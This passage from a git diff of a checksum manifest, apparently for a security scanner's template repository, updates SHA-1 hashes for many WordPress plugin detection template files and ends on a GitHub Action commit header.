-http/technologies/wordpress/plugins/instagram-feed.yaml:d4b4bfb7b132afadc85e36402cd09e9b5c3241df -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4fa84f328600dfc2bb720672bc13eaf1729319b9 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:e307451602ae1718cf149514eeb352cf5c4db9b6 -http/technologies/wordpress/plugins/jetpack.yaml:2a8fd06604e3e8b0ecfa80cafc3f99893acff62c -http/technologies/wordpress/plugins/kadence-blocks.yaml:a0f1e5c95ce8b8c334d97c6ddc66cd94af4e2bed -http/technologies/wordpress/plugins/kirki.yaml:3d86f7af6b00aaff20ef6a7630e9a2632a0002d9 -http/technologies/wordpress/plugins/leadin.yaml:298f0c32bd86a4e0f432950095d1a9cd8e020694 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:01efb2d8e4fef40866c9c66b6389ce3cdcf9d813 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:1dfeed1c7d07df007a491fd6f813e0046ce15518 -http/technologies/wordpress/plugins/litespeed-cache.yaml:2708887f0e18ca9d02025373165f32727790f4e3 -http/technologies/wordpress/plugins/loco-translate.yaml:bfaf27c172701efc6fce1d58321495dc038579d9 -http/technologies/wordpress/plugins/loginizer.yaml:c35e1c26bc9ca6fb7ac29de20e00647b0f2b1815 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:5aaff5f345d564b0a21a2ceb466bb2bfa1d9420a -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:320c2ef15c9cf9805165121aac65b6b6e1d21e43 -http/technologies/wordpress/plugins/mailpoet.yaml:7bc0c4158c92230192483e545bf439aa283b2289 -http/technologies/wordpress/plugins/maintenance.yaml:1b0820b8810d4c960341e42f6d063cd55eed283d -http/technologies/wordpress/plugins/mainwp-child.yaml:fc5ff914d63ba3495b2586848a3d17402b6ec2fa -http/technologies/wordpress/plugins/malcare-security.yaml:dfb9a9886a4e4ae24ee01504ed65d4f777ea166a -http/technologies/wordpress/plugins/megamenu.yaml:f6890e18ab1dcc7c7516bfaf127f5c637b3278bc -http/technologies/wordpress/plugins/members.yaml:a6483c9194fc2109162abbfc3e65b7fc3154db58 -http/technologies/wordpress/plugins/meta-box.yaml:784d85fdfa1202fc99b6939e28996e3b04b4b60d -http/technologies/wordpress/plugins/metform.yaml:8cb54806ab7a7f53ceee15cfe2683523a70e630f -http/technologies/wordpress/plugins/ml-slider.yaml:149e338a384a3c650811b9432d3162d1ad48b318 -http/technologies/wordpress/plugins/newsletter.yaml:e93ebc2c10bb6653d95188a12f1ee7b30bd478c6 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:ce8e73112cacb59bea625d0612b685aefeb56acb -http/technologies/wordpress/plugins/nextgen-gallery.yaml:9ae6ec4fc2a6994334c5541e3bb9414a707c0533 -http/technologies/wordpress/plugins/ninja-forms.yaml:462f30bc47a94bc440be1addc064a67083858b3f -http/technologies/wordpress/plugins/ocean-extra.yaml:39e8f1c4aa3f4fa9c142aee22809c203cbe10f36 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:725137bbad3ee1f6414ca9e08f3a10d87fd77fd0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ebe9927a2ab6cba1e292cecd75afaa8ab8a0a24f -http/technologies/wordpress/plugins/optinmonster.yaml:624ea013f2d3608b0bcc8f6012277547b2b2027c -http/technologies/wordpress/plugins/otter-blocks.yaml:ddc7e131a5485a6cc103213825d1c60b577f7dba -http/technologies/wordpress/plugins/password-protected.yaml:374a6bbd259a33b21d793f6d9061afd94730f2b7 -http/technologies/wordpress/plugins/pdf-embedder.yaml:50ef22eb0b2799a06aba2f3be69ab7dfd86fa55d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:957e706c3a99719d77e8558203addc8a94b5e62a -http/technologies/wordpress/plugins/pixelyoursite.yaml:15872e7aeb87a5a61d9805963439398dfc9a2ff5 -http/technologies/wordpress/plugins/polylang.yaml:c2fd36b0acac0465ee7953436709954950b4b0c2 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:e0b5fcfc1b03de46155326d0d931cff89e06520f -http/technologies/wordpress/plugins/post-smtp.yaml:d7a6b80ad2d85def96a4564291584b4942bb40a7 -http/technologies/wordpress/plugins/post-types-order.yaml:0b1af8ff4053949707f3e1705543739ee30e1218 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:8886a898c777272ebf1dd2dad53fc8b3c57579fc -http/technologies/wordpress/plugins/pretty-link.yaml:2d9674474365aad666a1a583dc825968d15759cc -http/technologies/wordpress/plugins/really-simple-captcha.yaml:6ae8dce7b3a4631dd5e34160390095eecafe3438 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:973d131547f05be1704d6d67e1da594bbf287460 -http/technologies/wordpress/plugins/redirection.yaml:a30a44c991a15369c97ab2bcc6654698318a584d -http/technologies/wordpress/plugins/redux-framework.yaml:373b9e101d104e6904aa18fb86489bacafcca8dd -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:4161ee511dec16778051db68c2d40a7018d6c78c -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:80bafaf1d09cbbe8967a5f8035956a96c7cb3f3a -http/technologies/wordpress/plugins/safe-svg.yaml:8efd20bcb6e7a81cf589f117b3060dc8cf01f2b7 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:add29adaf2b8cb9f606f1757b4c41a33e4555d3b -http/technologies/wordpress/plugins/sg-cachepress.yaml:2e9077ba5978afa62ee1ad92469103e41bf15843 -http/technologies/wordpress/plugins/sg-security.yaml:0d016b453104bfd3d2e9cd9ac6c95b1f60792d1e -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:fa44a41b755b63f8e9e98077a1c4c24c66743a65 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a549940df32365639415ee5ff27c2546b2dc3f0e -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:fe3472bf81f0f9970706b00c6cb91c0158382f7b -http/technologies/wordpress/plugins/simple-history.yaml:5fbfd3b16489f3088462e07331ac073687654b61 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:f17f82e5b75836af36484adb9bd374b1058c1260 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:3fffe56e671649f0626965cb667c15a73583c25f -http/technologies/wordpress/plugins/smart-slider-3.yaml:20866bc741cccecf510d22a0356e47020efd213f -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:c274e6deb209c0887c5c306cc44b3b8f4f3fd67f +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:5f55ee561df8bb96bc9599d4da59320cb360a4f1 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:924bd0c04fbc11b23ee02e86fe350f59b494fec7 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:1fcc07b5e44848a6b36f31f7fd553bcb2278ccad +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:c53dceeb91415ca4bbcc4c995c32e80393668d77 -http/technologies/wordpress/plugins/tablepress.yaml:3f03c0a4e1577342db766fb25130b6612ea2b3a1 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:6ac146cca77736a28774275f888d16d344c46002 -http/technologies/wordpress/plugins/templately.yaml:adc340c457b91a7f361d7312569363517b304153 -http/technologies/wordpress/plugins/the-events-calendar.yaml:fd4ff18fd0112a5bd3d41e8b17160639d2589086 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:492823f6af074b34570f07d1ff310a0113f67955 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:e429256d43910ae6503736db0c3093f1bf902b26 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:c7bd7b504a9248f6ae107e7fc44b4d7151aca84f -http/technologies/wordpress/plugins/under-construction-page.yaml:78cf5368373bcb9d1dccf0ec506cb41509961b77 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:778866f45a8ec05a0be941e1efb45d26ce8d87e3 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:6b5c90a216996fa87885490e5bd4826853dbf5bc +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:5193a4299dd58dfbddb6ef707335cb91d2269dcd -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:58237f477e03c725e443fa7cfdb177c12ff9460d -http/technologies/wordpress/plugins/webp-express.yaml:5d46350ca0fcf42fcfa13b2a8e808ddd5654bbc3 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:99aa09b086e97a6d3b40765807ef44c1e1df65a1 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:d49271d2f86a17c0d8d55df30f3bfb8158304123 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:5d54b831c52fd527d9934dfdfa4450080df3a41a -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:1095f70a6bd7f8d2f97fe8e8976e9ace78382d2b +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:265d906e754e9fb52def5496d7efc0d3656f6941 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:b10981d9a855f3c3dcdc446a7ffab5335dbaa8a7 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:13787c6dcddcc0d3faa52b2725a6999ecb2ef65c -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:c26dbda9acf5a95641fff13ad118aa7bc7810038 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:f2b6138a1f3580ab969d5792e16ef632dc1f7831 -http/technologies/wordpress/plugins/woocommerce-services.yaml:fa747c5a80f0cf59e5e1c46d68d6e3b7cfe9e8e3 -http/technologies/wordpress/plugins/woocommerce.yaml:2478239bcec819f4335c5c05866cb3d4ca010547 -http/technologies/wordpress/plugins/wordfence.yaml:35a35c9bf106219ef4e30eb3bd8177c1b59f735c -http/technologies/wordpress/plugins/wordpress-importer.yaml:05034fcdd19ac923c5a3a8843738e3947a255cdb -http/technologies/wordpress/plugins/wordpress-seo.yaml:a0d6dcb927e78a5408044dbb7b8c73844d053469 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:576b13e5c91e36bff0fb0985919cea82989356cc -http/technologies/wordpress/plugins/wp-crontrol.yaml:811d6ee15d9b3bb5c8d977d7283b33b8e69d53f3 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:59eff1e48d9a4d9b344704ee0b0f4bbc7ebc81f3 -http/technologies/wordpress/plugins/wp-file-manager.yaml:9e70241da0a5e614dce1a9a14b545de5c631ecce -http/technologies/wordpress/plugins/wp-google-maps.yaml:f541a8d949ecda216f53fb9f8957b35a1e41668f -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:007d7bd0852355040383561db6df2b424050711a -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d222accd75b8b3c3016b979d7ac5a65d19f23009 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:190d951898e1a1ae8ec96bce93adc069a52671ee -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:1ae9d9d5e49c49b0341bc20ab0d97b3b795afaa1 -http/technologies/wordpress/plugins/wp-optimize.yaml:6f3932fe3a55c6eddd51e21dc32c0dbe0ef9574c -http/technologies/wordpress/plugins/wp-pagenavi.yaml:fa900a40b3976d823eae8555cd935c819390212b -http/technologies/wordpress/plugins/wp-reset.yaml:56d6c73fd057820bb3707b9041414d61548c038b -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:f53a35f63e091b301c2c834f3a2218ead5262442 -http/technologies/wordpress/plugins/wp-rollback.yaml:ba77a2f4281c3f4ed923595189c14b16e7686891 -http/technologies/wordpress/plugins/wp-seopress.yaml:ec5bbd54bcd0d9bd1ef9cd0b0a5bae7d355c5b5c -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:65def275e8c6f0bde309e7bac8ed3d061d22c25d -http/technologies/wordpress/plugins/wp-smushit.yaml:7ac33bc2154f6240713ec1140de6dd3dbad59ded -http/technologies/wordpress/plugins/wp-statistics.yaml:e5b7b8f98f10b66238d6b39cef1ea9d2fb14b313 -http/technologies/wordpress/plugins/wp-super-cache.yaml:661060e33019702745efcb4f069915787b4877f9 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:436e37a21507a58d139a1432a47dadeee2d26a49 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:db3e7bd813ad6479d6fbb2a48234b33aa6acbf43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:3b3d22cef14074cde4e88d2fac9d8366ef1d60ba -http/technologies/wordpress/plugins/wps-hide-login.yaml:410e019670f52e5418c3f097a5fda164e4fd4d0f -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:5c6704cdebc3c91d5ff5924feb06b28b381e4ab6 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:91eaabb68a74c5e6452df63eb64dfcb7d3fb8cd1 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8901,7 +8901,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:984e6115bf2b042cd3c1b53b7ff43c8cb0e0d085 +templates-checksum.txt:26067eae85e1c1412c407243cbf81c4ec604cecb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 78f51e14782daecf5293c1cb3424790f581b3253 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 19 Jul 2024 06:41:00 +0000 Subject: [PATCH 